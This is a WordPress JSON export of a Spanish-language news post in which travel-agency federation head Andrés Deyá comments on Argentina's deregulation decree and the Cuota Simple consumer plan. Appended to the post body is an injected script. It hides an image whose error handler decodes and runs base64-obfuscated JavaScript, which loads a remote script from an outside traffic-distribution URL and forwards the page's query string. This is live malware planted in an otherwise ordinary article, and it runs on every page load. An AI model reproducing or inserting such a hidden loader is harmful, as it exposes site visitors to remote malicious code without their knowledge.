{"id":7929,"date":"2024-02-22T10:16:34","date_gmt":"2024-02-22T13:16:34","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=7929"},"modified":"2025-08-13T15:47:02","modified_gmt":"2025-08-13T18:47:02","slug":"las-agencias-de-viaje-buscan-certezas-y-ponderan-el-impacto-de-cuota-simple","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=7929","title":{"rendered":"Las agencias de viaje buscan \u00abcertezas\u00bb y ponderan el impacto de Cuota Simple"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-5059195ebb585fe0f779625cd6c5ee6a\" style=\"background-color:#053e5e\"><em>El presidente de la Federaci\u00f3n Argentina de Asociaciones de Empresas de Viajes y Turismo, Andr\u00e9s Dey\u00e1, se\u00f1al\u00f3 que el sector\u00a0\u00abest\u00e1 tratando de generar condiciones que den certezas\u00bb\u00a0tras el dictado del DNU 70\/2023 que derog\u00f3 la ley regulatoria de la actividad.<\/em><\/h4>\n\n\n\n<p>El presidente de la Federaci\u00f3n Argentina de Asociaciones de Empresas de Viajes y Turismo (Faevyt), Andr\u00e9s Dey\u00e1, se\u00f1al\u00f3 que el sector<strong>&nbsp;\u00ab<\/strong>est\u00e1 tratando de generar condiciones que den certezas\u00bb a esas empresas tur\u00edsticas<strong>&nbsp;<\/strong>tras el dictado del DNU 70\/2023, que derog\u00f3 la Ley N\u00b0 18.829, regulatoria de su actividad, al tiempo que ponder\u00f3 el impacto del plan Cuota Simple en la comercializaci\u00f3n de productos y servicios tur\u00edsticos.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright size-full\"><a href=\"https:\/\/www.copahuepatagoniatermal.com.ar\/\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" width=\"300\" height=\"200\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/02\/GIF-COPAHUE_FEB24-1.gif\" alt=\"\" class=\"wp-image-7925\" \/><\/a><figcaption class=\"wp-element-caption\"><em><sup><mark class=\"has-inline-color has-vivid-green-cyan-color\">Publicidad:<\/mark><\/sup><\/em><\/figcaption><\/figure>\n<\/div>\n\n\n<p>\u00abEstamos tratando de generar condiciones que den certezas a los agentes de viaje porque continuamos trabajando. Desde Faevyt buscamos generar un marco de trabajo que sea sostenible en el tiempo. En los pr\u00f3ximos d\u00edas habr\u00e1 novedades\u00bb, dijo Dey\u00e1 en di\u00e1logo con T\u00e9lam Radio.<\/p>\n\n\n\n<p>El empresario se\u00f1al\u00f3 que la actual temporada estival es \u00abat\u00edpica\u00bb porque \u00abla gente decidi\u00f3 viajar, pero lo hizo a \u00faltimo momento y por menos d\u00edas,&nbsp;<strong>esperando a ver c\u00f3mo se acomodaban las medidas econ\u00f3micas<\/strong>\u00bb que fue tomando el Gobierno encabezado por Javier Milei, quien asumi\u00f3 el 10 de diciembre, a d\u00edas del inicio del verano.<\/p>\n\n\n\n<p>\u00abLa temporada -evalu\u00f3 Dey\u00e1- ha ido de menor a mayor, terminando en estos d\u00edas de Carnaval (NdR: fueron celebrados entre el 10 y 13 de este mes) con bastante gente (viajando a los diversos destinos tur\u00edsticos del pa\u00eds) y ahora con bastante expectativa de cara a Semana Santa\u00bb, cuya celebraci\u00f3n ser\u00e1n los pr\u00f3ximos 28 y 29 de marzo.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/www.telam.com.ar\/thumbs\/bluesteel\/advf\/imagenes\/2024\/02\/65ce8536a213b_1200.jpg\" alt=\"\" \/><figcaption class=\"wp-element-caption\"><em><sup>Para Dey\u00e1 la temporada estival es at\u00edpica porque \u00abla gente decidi\u00f3 viajar a \u00faltimo momento y por menos d\u00edas\u00bb \/ Foto: Archivo.<\/sup><\/em><\/figcaption><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Conocimiento y capacitaci\u00f3n<\/h2>\n\n\n\n<p>En otro tramo de la entrevista con T\u00e9lam Radio, Dey\u00e1 sostuvo que \u00abel mayor patrimonio de las agencias de viajes es el&nbsp;<strong>conocimiento, la capacitaci\u00f3n y el pasajero<\/strong>\u00bb y se\u00f1al\u00f3 que tales activos deben ser \u00abel foco\u00bb del sector a partir de la desregulaci\u00f3n del mercado.<\/p>\n\n\n\n<p>\u00abHay que decirle al pasajero que siga confiando en su agencia de viajes de siempre, que sigue teniendo los mismos valores, la misma capacitaci\u00f3n, las mismas herramientas nacionales e internacionales para asegurarle su viaje\u00bb, ampli\u00f3.<\/p>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p>\u00abLos primeros n\u00fameros que vamos teniendo de la implementaci\u00f3n del sistema de Cuotas Simples son realmente muy buenos\u00bbAndr\u00e9s Dey\u00e1, presidente de &nbsp;Faevyt<\/p>\n<\/blockquote>\n\n\n\n<p>En ese sentido, el empresario asegur\u00f3 que la Federaci\u00f3n que preside<strong>&nbsp;implement\u00f3 \u00abm\u00e1s de 250 cursos\u00bb de capacitaci\u00f3n a lo largo de 2023, orientados a sus afiliados<\/strong>.<\/p>\n\n\n\n<p>\u00abNo somos un rubro improvisado, somos uno con un capital humano importante\u00bb, enfatiz\u00f3 Dey\u00e1, quien, por otra parte, ponder\u00f3 el impacto positivo que tuvo la inclusi\u00f3n del sector tur\u00edstico en Cuota Simple, el programa de fomento al consumo lanzado por el Gobierno nacional hacia fines del mes pasado.<\/p>\n\n\n\n<p>\u00abLos primeros n\u00fameros que vamos teniendo de la<strong>&nbsp;implementaci\u00f3n del sistema de Cuotas Simples<\/strong>&nbsp;son realmente muy buenos\u00bb, asegur\u00f3 el titular de Faevyt.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/www.telam.com.ar\/notas\/202402\/655839-turismo-agencias-cuota-simple.html\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" width=\"1024\" height=\"103\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/Captura-web_24-10-2023_201237_www.telam_.com_.ar_-1024x103.jpeg\" alt=\"\" class=\"wp-image-7468\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/Captura-web_24-10-2023_201237_www.telam_.com_.ar_-1024x103.jpeg 1024w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/Captura-web_24-10-2023_201237_www.telam_.com_.ar_-300x30.jpeg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/Captura-web_24-10-2023_201237_www.telam_.com_.ar_-768x77.jpeg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/Captura-web_24-10-2023_201237_www.telam_.com_.ar_-696x70.jpeg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/Captura-web_24-10-2023_201237_www.telam_.com_.ar_-320x32.jpeg 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/Captura-web_24-10-2023_201237_www.telam_.com_.ar_-480x48.jpeg 480w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/Captura-web_24-10-2023_201237_www.telam_.com_.ar_-800x80.jpeg 800w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/Captura-web_24-10-2023_201237_www.telam_.com_.ar_.jpeg 1067w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><figcaption class=\"wp-element-caption\">Fuente:<\/figcaption><\/figure>\n\n\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El presidente de la Federaci\u00f3n Argentina de Asociaciones de Empresas de Viajes y Turismo, Andr\u00e9s Dey\u00e1, se\u00f1al\u00f3 que el sector\u00a0\u00abest\u00e1 tratando de generar condiciones que den certezas\u00bb\u00a0tras el dictado del DNU 70\/2023 que derog\u00f3 la ley regulatoria de la actividad. El presidente de la Federaci\u00f3n Argentina de Asociaciones de Empresas de Viajes y Turismo (Faevyt), [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":7930,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-7929","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-argentina"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/7929","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=7929"}],"version-history":[{"count":2,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/7929\/revisions"}],"predecessor-version":[{"id":10210,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/7929\/revisions\/10210"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/7930"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=7929"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=7929"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=7929"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}